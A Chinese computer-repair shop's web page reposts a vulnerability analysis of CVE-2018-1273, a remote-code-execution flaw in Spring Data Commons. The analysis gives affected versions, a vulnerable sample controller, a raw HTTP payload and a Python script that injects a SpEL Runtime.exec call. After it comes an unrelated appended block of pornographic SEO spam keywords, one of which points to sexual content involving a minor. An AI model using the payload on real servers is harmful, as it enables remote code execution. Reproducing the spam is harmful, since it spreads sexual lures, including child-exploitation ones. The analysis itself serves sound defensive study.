錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
Spring-data-commons(CVE-2018-1273)漏洞分析
作者: 佚名  日期:2018-06-01 21:01:44   來源: 本站整理

 CVE-2018-1273 是 Spring-data-commons近期爆出的一個可遠程執行代碼的漏洞,為了了解更多細節,本文將從漏洞的成因,漏洞的判定以及漏洞的利用三個方面來進行詳細說明。
漏洞的成因
當用戶在項目中利用了Spring-data的相關web特性對用戶的輸入參數進行自動匹配的時候,會將用戶提交的form表單的key值作為Spel的執行內容,而這一步就是本次漏洞的爆發點。
漏洞的判定
確認目標項目中含有Spring-data-commons包并且版本范圍如下
Spring Data Commons 1.13 to 1.13.10
Spring Data Commons 2.0 to 2.0.5
查看相關特性是否已經開啟
1.@EnableSpringDataWebSupport 被顯示聲明
2.@EnableSpringDataWebSupport 沒有顯示聲明,但采用了spring-boot框架的自動掃描特性 當采用Spring-boot的自動掃描特性的時候,在啟動時會自動加載 SpringDataWebConfiguration類效果與上述相同
3.在非注解聲明項目中,如果有如下聲明,也視為開啟了相關的特性
  class="org.springframework.data.web.config.SpringDataWebConfiguration" />
檢查帶@RequestMapping的接口,方法的參數為一個自定義的接口(Interface)
滿足如上條件的靶子代碼如下
  @SpringBootApplication
  public class App {
      public static void main(String[] args) {
          SpringApplication.run(App.class);
      }
      @Controller
      public class TestController {
          @RequestMapping("test")
          public void CVEController(TestForm testForm){
              System.out.println(testForm.getName());
          }
      }
      interface TestForm {
          String getName();
      }
  }
漏洞的利用
根據上述判定出來的漏洞點,我們可以構造如下攻擊代碼
1.構建一個Http的Post請求2.利用form表單提交的方式來提交我們的key value3.在key的名稱中包含此次攻擊代碼4.提交的key為上文的 getName() 方法的 name5.在name后面補上一段Spel支持的代碼片段,key將變成如 name[T(java.lang.Runtime).getRuntime().exec("calc")]
最終playload如下
POST /test HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
name%5BT(java.lang.Runtime).getRuntime().exec(%22calc%22)%5D=v
用python寫的簡單腳本如下
import http.client, urllib.parse
command = "calc.exe"
key = 'name[T(java.lang.Runtime).getRuntime().exec("%s")]' % command
params = urllib.parse.urlencode({key: 'v'})
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = http.client.HTTPConnection(host="localhost",port=8080)
conn.request("POST", "/test", params, headers)
conn.close()
總而言之當滿足漏洞條件時,只需要發送一個特定的key就可以了
Spring-data-commons漏洞被執行的流程
本次漏洞的成因,主要在于Spring在自動解析用戶的參數的時候采用了 SpelExpressionParser 來解析propertyName
MapDataBinder.java 169行
  Expression expression = PARSER.parseExpression(propertyName);
  PropertyPath leafProperty = getPropertyPath(propertyName).getLeafProperty();
  TypeInformation owningType = leafProperty.getOwningType();
  TypeInformation propertyType = owningType.getProperty(leafProperty.getSegment());
  propertyType = propertyName.endsWith("]") ? propertyType.getActualType() : propertyType;
  if (conversionRequired(value, propertyType.getType())) {
    PropertyDescriptor descriptor = BeanUtils
        .getPropertyDescriptor(owningType.getType(), leafProperty.getSegment());
    MethodParameter methodParameter = new MethodParameter(descriptor.getReadMethod(), -1);
    TypeDescriptor typeDescriptor = TypeDescriptor.nested(methodParameter, 0);
    value = conversionService.convert(value, TypeDescriptor.forObject(value), typeDescriptor);
  }
  expression.setValue(context, value);
那么這個MapMapDataBinder是怎么被調用起來的呢,我們簡要地說一下 SpringMVC在解析參數這個部分
SpringDataWebConfiguration 類的特性被啟用的時候,會將 ProxyingHandlerMethodArgumentResolver 注冊到容器中去
當SpringMVC得到一個請求的時候,會遍歷容器中注冊的 HandlerMethodArgumentResolver 調用他們的supportsParameter方法。由于我們的參數是一個Interface(接口),那么 ProxyingHandlerMethodArgumentResolver 就會告訴調用方,它支持這個參數的解析即 supportsParameter 會返回true,但在實際中還會有多個判斷比如該接口不能是java包下的,也不能是org.springframework包下的
ProxyingHandlerMethodArgumentResolver在拿到參數的時候會創建一個MapDataBinder來解析參數MapDataBinder.bind()方法,會連帶進行doBind操作,最終會調用到 setPropertyValue 方法來,最后在 expression.setValue(context, value) 的時候觸發了漏洞
熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
    • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等

    感谢您访问我们的网站,您可能还对以下资源感兴趣:

    91欧美日韩
    主站蜘蛛池模板: 日韩精品无码专区免费播放| 无码被窝影院午夜看片爽爽jk| 无码一区二区三区中文字幕| 久久人妻内射无码一区三区| 亚洲精品~无码抽插| 亚洲桃色AV无码| 国产精品无码久久综合| 精品少妇人妻av无码久久| 国产免费av片在线无码免费看| 无翼乌工口肉肉无遮挡无码18| 国产成人综合日韩精品无码不卡 | 中文字幕人妻无码系列第三区| 国产精品99精品无码视亚| 国产在线无码精品无码| 亚洲精品无码久久久久sm| 亚洲国产精品无码久久久秋霞1| 亚洲av无码无在线观看红杏| 亚洲AV无码久久久久网站蜜桃 | yy111111少妇影院里无码| 久久精品亚洲AV久久久无码| 日韩成人无码影院| 亚洲AV无码成人精品区天堂| 无码毛片一区二区三区中文字幕 | 无码专区永久免费AV网站| 亚洲AV中文无码乱人伦下载| 激情射精爆插热吻无码视频 | 亚洲国产精品无码第一区二区三区| 无码乱码观看精品久久| 国产成人无码A区精油按摩| 日韩av无码中文字幕| 色情无码WWW视频无码区小黄鸭 | 无码精品蜜桃一区二区三区WW| 日韩精品少妇无码受不了| 久久久无码精品亚洲日韩软件| 中文AV人妻AV无码中文视频 | 本道久久综合无码中文字幕| 久久久久久AV无码免费网站下载| 国产精品无码国模私拍视频| 小12箩利洗澡无码视频网站| 亚洲精品无码mⅴ在线观看| 91精品日韩人妻无码久久不卡|